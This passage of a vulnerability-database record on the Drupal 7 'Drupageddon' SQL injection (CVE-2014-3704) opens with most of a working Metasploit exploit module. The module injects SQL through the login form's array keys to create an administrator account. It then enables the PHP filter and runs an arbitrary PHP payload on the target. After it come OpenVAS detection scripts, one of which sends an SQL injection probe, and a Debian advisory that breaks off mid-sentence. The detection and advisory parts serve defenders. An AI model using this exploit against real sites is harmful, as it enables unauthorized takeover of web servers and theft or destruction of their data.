\n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']) \n], self.class) \n \nregister_advanced_options( \n[ \nOptString.new('ADMIN_ROLE', [ true, \"The administrator role\", 'administrator']), \nOptInt.new('ITER', [ true, \"Hash iterations (2^ITER)\", 10]) \n], self.class) \nend \n \ndef uri_path \nnormalize_uri(target_uri.path) \nend \n \ndef admin_role \ndatastore['ADMIN_ROLE'] \nend \n \ndef iter \ndatastore['ITER'] \nend \n \ndef itoa64 \n'./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' \nend \n \n# PHPs PHPASS base64 method \ndef phpass_encode64(input, count) \nout = '' \ncur = 0 \nwhile cur < count \nvalue = input[cur].ord \ncur += 1 \nout << itoa64[value & 0x3f] \nif cur < count \nvalue |= input[cur].ord << 8 \nend \nout << itoa64[(value >> 6) & 0x3f] \nbreak if cur >= count \ncur += 1 \n \nif cur < count \nvalue |= input[cur].ord << 16 \nend \nout << itoa64[(value >> 12) & 0x3f] \nbreak if cur >= count \ncur += 1 \nout << itoa64[(value >> 18) & 0x3f] \nend \nout \nend \n \ndef generate_password_hash(pass) \n# Syntax for MD5: \n# $P$ = MD5 \n# one char representing the hash iterations (min 7) \n# 8 chars salt \n# MD5_raw(salt.pass) + iterations \n# MD5 phpass base64 encoded (!= encode_base64) and trimmed to 22 chars for md5 \niter_char = itoa64[iter] \nsalt = Rex::Text.rand_text_alpha(8) \nmd5 = Rex::Text.md5_raw(\"#{salt}#{pass}\") \n# convert iter from log2 to integer \niter_count = 2**iter \n1.upto(iter_count) { \nmd5 = Rex::Text.md5_raw(\"#{md5}#{pass}\") \n} \nmd5_base64 = phpass_encode64(md5, md5.length) \nmd5_stripped = md5_base64[0...22] \npass = \"$P\\\\$\" + iter_char + salt + md5_stripped \nvprint_debug(\"#{peer} - password hash: #{pass}\") \n \nreturn pass \nend \n \ndef sql_insert_user(user, pass) \n\"insert into users (uid, name, pass, mail, status) select max(uid)+1, '#{user}', '#{generate_password_hash(pass)}', '#{Rex::Text.rand_text_alpha_lower(5)}@#{Rex::Text.rand_text_alpha_lower(5)}.#{Rex::Text.rand_text_alpha_lower(3)}', 1 from users\" \nend \n \ndef sql_make_user_admin(user) \n\"insert into users_roles (uid, rid) VALUES ((select uid from users where name='#{user}'), (select rid from role where name = '#{admin_role}'))\" \nend \n \ndef extract_form_ids(content) \nform_build_id = $1 if content =~ /name=\"form_build_id\" value=\"(.+)\" \\/>/ \nform_token = $1 if content =~ /name=\"form_token\" value=\"(.+)\" \\/>/ \n \nvprint_debug(\"#{peer} - form_build_id: #{form_build_id}\") \nvprint_debug(\"#{peer} - form_token: #{form_token}\") \n \nreturn form_build_id, form_token \nend \n \ndef exploit \n \n# TODO: Check if option admin_role exists via admin/people/permissions/roles \n \n# call login page to extract tokens \nprint_status(\"#{peer} - Testing page\") \nres = send_request_cgi({ \n'uri' => uri_path, \n'vars_get' => { \n'q' => 'user/login' \n} \n}) \n \nunless res and res.body \nfail_with(Failure::Unknown, \"No response or response body, bailing.\") \nend \n \nform_build_id, form_token = extract_form_ids(res.body) \n \nuser = Rex::Text.rand_text_alpha(10) \npass = Rex::Text.rand_text_alpha(10) \n \npost = { \n\"name[0 ;#{sql_insert_user(user, pass)}; #{sql_make_user_admin(user)}; # ]\" => Rex::Text.rand_text_alpha(10), \n'name[0]' => Rex::Text.rand_text_alpha(10), \n'pass' => Rex::Text.rand_text_alpha(10), \n'form_build_id' => form_build_id, \n'form_id' => 'user_login', \n'op' => 'Log in' \n} \n \nprint_status(\"#{peer} - Creating new user #{user}:#{pass}\") \nres = send_request_cgi({ \n'uri' => uri_path, \n'method' => 'POST', \n'vars_post' => post, \n'vars_get' => { \n'q' => 'user/login' \n} \n}) \n \nunless res and res.body \nfail_with(Failure::Unknown, \"No response or response body, bailing.\") \nend \n \n# login \nprint_status(\"#{peer} - Logging in as #{user}:#{pass}\") \nres = send_request_cgi({ \n'uri' => uri_path, \n'method' => 'POST', \n'vars_post' => { \n'name' => user, \n'pass' => pass, \n'form_build_id' => form_build_id, \n'form_id' => 'user_login', \n'op' => 'Log in' \n}, \n'vars_get' => { \n'q' => 'user/login' \n} \n}) \n \nunless res and res.code == 302 \nfail_with(Failure::Unknown, \"No response or response body, bailing.\") \nend \n \ncookie = res.get_cookies \nvprint_debug(\"#{peer} - cookie: #{cookie}\") \n \n# call admin interface to extract CSRF token and enabled modules \nprint_status(\"#{peer} - Trying to parse enabled modules\") \nres = send_request_cgi({ \n'uri' => uri_path, \n'vars_get' => { \n'q' => 'admin/modules' \n}, \n'cookie' => cookie \n}) \n \nform_build_id, form_token = extract_form_ids(res.body) \n \nenabled_module_regex = /name=\"(.+)\" value=\"1\" checked=\"checked\" class=\"form-checkbox\"/ \nenabled_matches = res.body.to_enum(:scan, enabled_module_regex).map { Regexp.last_match } \n \nunless enabled_matches \nfail_with(Failure::Unknown, \"No modules enabled is incorrect, bailing.\") \nend \n \npost = { \n'modules[Core][php][enable]' => '1', \n'form_build_id' => form_build_id, \n'form_token' => form_token, \n'form_id' => 'system_modules', \n'op' => 'Save configuration' \n} \n \nenabled_matches.each do |match| \npost[match.captures[0]] = '1' \nend \n \n# enable PHP filter \nprint_status(\"#{peer} - Enabling the PHP filter module\") \nres = send_request_cgi({ \n'uri' => uri_path, \n'method' => 'POST', \n'vars_post' => post, \n'vars_get' => { \n'q' => 'admin/modules/list/confirm' \n}, \n'cookie' => cookie \n}) \n \nunless res and res.body \nfail_with(Failure::Unknown, \"No response or response body, bailing.\") \nend \n \n# Response: http 302, Location: http://10.211.55.50/?q=admin/modules \n \nprint_status(\"#{peer} - Setting permissions for PHP filter module\") \n \n# allow admin to use php_code \nres = send_request_cgi({ \n'uri' => uri_path, \n'vars_get' => { \n'q' => 'admin/people/permissions' \n}, \n'cookie' => cookie \n}) \n \n \nunless res and res.body \nfail_with(Failure::Unknown, \"No response or response body, bailing.\") \nend \n \nform_build_id, form_token = extract_form_ids(res.body) \n \nperm_regex = /name=\"(.*)\" value=\"(.*)\" checked=\"checked\"/ \nenabled_perms = res.body.to_enum(:scan, perm_regex).map { Regexp.last_match } \n \nunless enabled_perms \nfail_with(Failure::Unknown, \"No enabled permissions were able to be parsed, bailing.\") \nend \n \n# get administrator role id \nid = $1 if res.body =~ /for=\"edit-([0-9]+)-administer-content-types\">#{admin_role}:/ \nvprint_debug(\"#{peer} - admin role id: #{id}\") \n \nunless id \nfail_with(Failure::Unknown, \"Could not parse out administrator ID\") \nend \n \npost = { \n\"#{id}[use text format php_code]\" => 'use text format php_code', \n'form_build_id' => form_build_id, \n'form_token' => form_token, \n'form_id' => 'user_admin_permissions', \n'op' => 'Save permissions' \n} \n \nenabled_perms.each do |match| \npost[match.captures[0]] = match.captures[1] \nend \n \nres = send_request_cgi({ \n'uri' => uri_path, \n'method' => 'POST', \n'vars_post' => post, \n'vars_get' => { \n'q' => 'admin/people/permissions' \n}, \n'cookie' => cookie \n}) \n \nunless res and res.body \nfail_with(Failure::Unknown, \"No response or response body, bailing.\") \nend \n \n# Add new Content page (extract csrf token) \nprint_status(\"#{peer} - Getting tokens from create new article page\") \nres = send_request_cgi({ \n'uri' => uri_path, \n'vars_get' => { \n'q' => 'node/add/article' \n}, \n'cookie' => cookie \n}) \n \nunless res and res.body \nfail_with(Failure::Unknown, \"No response or response body, bailing.\") \nend \n \nform_build_id, form_token = extract_form_ids(res.body) \n \n# Preview to trigger the payload \ndata = Rex::MIME::Message.new \ndata.add_part(Rex::Text.rand_text_alpha(10), nil, nil, 'form-data; name=\"title\"') \ndata.add_part(form_build_id, nil, nil, 'form-data; name=\"form_build_id\"') \ndata.add_part(form_token, nil, nil, 'form-data; name=\"form_token\"') \ndata.add_part('article_node_form', nil, nil, 'form-data; name=\"form_id\"') \ndata.add_part('php_code', nil, nil, 'form-data; name=\"body[und][0][format]\"') \ndata.add_part(\"<?php #{payload.encoded} ?>\", nil, nil, 'form-data; name=\"body[und][0][value]\"') \ndata.add_part('Preview', nil, nil, 'form-data; name=\"op\"') \ndata.add_part(user, nil, nil, 'form-data; name=\"name\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"status\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"promote\"') \npost_data = data.to_s \n \nprint_status(\"#{peer} - Calling preview page. Exploit should trigger...\") \nsend_request_cgi( \n'method' => 'POST', \n'uri' => uri_path, \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data, \n'vars_get' => { \n'q' => 'node/add/article' \n}, \n'cookie' => cookie \n) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128741/drupal_drupageddon.rb.txt"}], "openvas": [{"lastseen": "2019-05-29T18:37:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "description": "Stefan Horst discovered a vulnerability in the Drupal database\nabstraction API, which may result in SQL injection.", "modified": "2019-03-19T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:1361412562310703051", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703051", "type": "openvas", "title": "Debian Security Advisory DSA 3051-1 (drupal7 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3051.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3051-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703051\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-3704\");\n script_name(\"Debian Security Advisory DSA 3051-1 (drupal7 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 00:00:00 +0200 (Wed, 15 Oct 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3051.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), this problem has been fixed in\nversion 7.14-2+deb7u7.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.32-1.\n\nWe recommend that you upgrade your drupal7 packages.\");\n script_tag(name:\"summary\", value:\"Stefan Horst discovered a vulnerability in the Drupal database\nabstraction API, which may result in SQL injection.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-08-02T10:49:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "description": "Stefan Horst discovered a vulnerability in the Drupal database\nabstraction API, which may result in SQL injection.", "modified": "2017-07-18T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:703051", "href": "http://plugins.openvas.org/nasl.php?oid=703051", "type": "openvas", "title": "Debian Security Advisory DSA 3051-1 (drupal7 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3051.nasl 6750 2017-07-18 09:56:47Z teissa $\n# Auto-generated from advisory DSA 3051-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703051);\n script_version(\"$Revision: 6750 $\");\n script_cve_id(\"CVE-2014-3704\");\n script_name(\"Debian Security Advisory DSA 3051-1 (drupal7 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-18 11:56:47 +0200 (Tue, 18 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-10-15 00:00:00 +0200 (Wed, 15 Oct 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3051.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"drupal7 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Drupal is a dynamic web site platform which allows an individual or\ncommunity of users to publish, manage and organize a variety of\ncontent, Drupal integrates many popular features of content\nmanagement systems, weblogs, collaborative tools and discussion-based\ncommunity software into one easy-to-use package.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), this problem has been fixed in\nversion 7.14-2+deb7u7.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.32-1.\n\nWe recommend that you upgrade your drupal7 packages.\");\n script_tag(name: \"summary\", value: \"Stefan Horst discovered a vulnerability in the Drupal database\nabstraction API, which may result in SQL injection.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u7\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u7\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u7\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "description": "Drupal is prone to an SQL-injection vulnerability", "modified": "2019-02-14T00:00:00", "published": "2014-10-30T00:00:00", "id": "OPENVAS:1361412562310105101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105101", "type": "openvas", "title": "Drupal Core SQL Injection Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_70595.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# Drupal Core SQL Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:drupal:drupal\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105101\");\n script_bugtraq_id(70595);\n script_cve_id(\"CVE-2014-3704\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 13659 $\");\n\n script_name(\"Drupal Core SQL Injection Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/70595\");\n script_xref(name:\"URL\", value:\"http://drupal.org/\");\n\n script_tag(name:\"impact\", value:\"Exploiting this issue could allow an attacker to execute arbitrary\ncode, to gain elevated privileges and to compromise the application, access or modify data, or exploit\nlatent vulnerabilities in the underlying database.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP POST request and check the response.\");\n script_tag(name:\"insight\", value:\"Drupal fails to sufficiently sanitize user-supplied data before using\nit in an SQL query.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n script_tag(name:\"summary\", value:\"Drupal is prone to an SQL-injection vulnerability\");\n script_tag(name:\"affected\", value:\"Drupal 7.x versions prior to 7.32 are vulnerable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-30 17:18:15 +0100 (Thu, 30 Oct 2014)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"drupal_detect.nasl\");\n script_mandatory_keys(\"drupal/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\ndata = 'name[0;%20SELECT+OpenVAS;#]=0&name[0]==OpenVAS&pass=OpenVAS&test2=test&form_build_id=&form_id=user_login_block&op=Log+in';\nlen = strlen( data );\n\nif (dir == \"/\") dir = \"\";\n\nreq = 'POST ' + dir + '/?q=node&destination=node HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Cookie: ZDEDebuggerPresent=php,phtml,php3\\r\\n' +\n 'Connection: Close\\r\\n' +\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n '\\r\\n' +\n data;\nresult = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( tolower( result ) =~ \"warning.*mb_strlen\\(\\) expects parameter 1\" && \"The website encountered an unexpected error\" >!< result ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "description": "Check the version of drupal7", "modified": "2019-03-15T00:00:00", "published": "2014-10-29T00:00:00", "id": "OPENVAS:1361412562310868435", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868435", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2014-13053", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2014-13053\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868435\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-29 05:51:39 +0100 (Wed, 29 Oct 2014)\");\n script_cve_id(\"CVE-2014-3704\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for drupal7 FEDORA-2014-13053\");\n script_tag(name:\"summary\", value:\"Check the version of drupal7\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-13053\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/141436.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.32~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704", "CVE-2014-3407"], "description": "Check the version of drupal7", "modified": "2019-03-15T00:00:00", "published": "2014-10-29T00:00:00", "id": "OPENVAS:1361412562310868440", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868440", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2014-13030", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2014-13030\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868440\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-29 05:53:01 +0100 (Wed, 29 Oct 2014)\");\n script_cve_id(\"CVE-2014-3407\", \"CVE-2014-3704\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for drupal7 FEDORA-2014-13030\");\n script_tag(name:\"summary\", value:\"Check the version of drupal7\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-13030\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/141512.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.32~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:06", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3704"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3051-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 15, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2014-3704\n\nStefan Horst discovered a vulnerability in the Drupal database \nabstraction API, which may result in SQL injection.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 7.14-2+deb7u7.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.32-1.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-10-15T18:37:56", "published": "2014-10-15T18:37:56", "id": "DEBIAN:DSA-3051-1:E0748", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00237.html", "title": "[SECURITY] [DSA 3051-1] drupal7 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:38", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3704"], "description": "Gunnar Wolf uploaded new packages for Drupal7 which fixed the\nfollowing security problems:\n\nCVE 2014-3704 / SA-CORE-2014-005:\n Highly critical: Pre Auth SQL injection\n\n The expandArguments function in the database abstraction API in\n Drupal core 7.x before 7.32 does not properly construct prepared\n statements, which allows remote attackers to conduct SQL injection\n attacks via an array containing crafted keys. \n\n https://www.drupal.org/SA-CORE-2014-005\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704\nhttps://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html\n\nFor the squeeze-backports distribution the problems have been fixed in\nversion 7.14-2+deb7u7~bpo60+1.\n\nFor the 